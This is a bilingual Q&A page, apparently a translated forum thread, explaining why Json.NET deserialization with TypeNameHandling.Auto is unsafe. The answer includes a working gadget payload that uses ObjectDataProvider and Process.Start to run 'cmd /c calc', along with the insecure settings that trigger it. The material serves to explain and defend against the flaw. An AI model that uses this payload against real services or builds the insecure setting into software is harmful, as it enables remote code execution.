问题描述
静态安全扫描程序在此行标记了我的C#代码:
A static security scanner has flagged my C# code on this line:
var result = JsonConvert.DeserializeObject<dynamic>(response);
响应
将包含来自Web API的JSON响应.
response
will contain a JSON response from a web API.
扫描仪将其标记为不安全的反序列化".
The scanner has flagged this as "insecure deserialization".
有人可以帮助我了解如何利用它吗?Web示例尚不清楚清除是否可以在 DeserializeObject
方法本身中进行,还是仅在反序列化之后才能进行.
Can someone help me understand how this can be exploited? Web examples are not really clear on whether the exploit can happen within the DeserializeObject
method itself or if only after the deserialization.
推荐答案
尝试反序列化此json:
Try to deserialize this json:
{
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName": "Start",
"MethodParameters": {
"$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"$values": [ "cmd", "/c calc" ]
},
"ObjectInstance": { "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" }
}
使用此代码
dynamic obj = JsonConvert.DeserializeObject<dynamic>(json, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
它将打开Windows计算器应用程序.可以运行任何可执行文件或脚本的方式相同.如果您使用 object
而不是 dynamic
或非通用的 DeserializeObject
方法,该问题仍然存在.请注意,如果您未设置 TypeNameHandling = TypeNameHandling.Auto
,则其他人可以这样设置全局设置:
It will open the Windows calculator application. The same way any executable or script could be run. The problem persists also if you use object
instead of dynamic
or the non generic DeserializeObject
method. Be aware that if you don't set TypeNameHandling = TypeNameHandling.Auto
someone else could set the global settings like this:
JsonConvert.DefaultSettings = () =>
new JsonSerializerSettings{TypeNameHandling = TypeNameHandling.Auto};
这篇关于使用Json.NET进行不安全的反序列化的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持!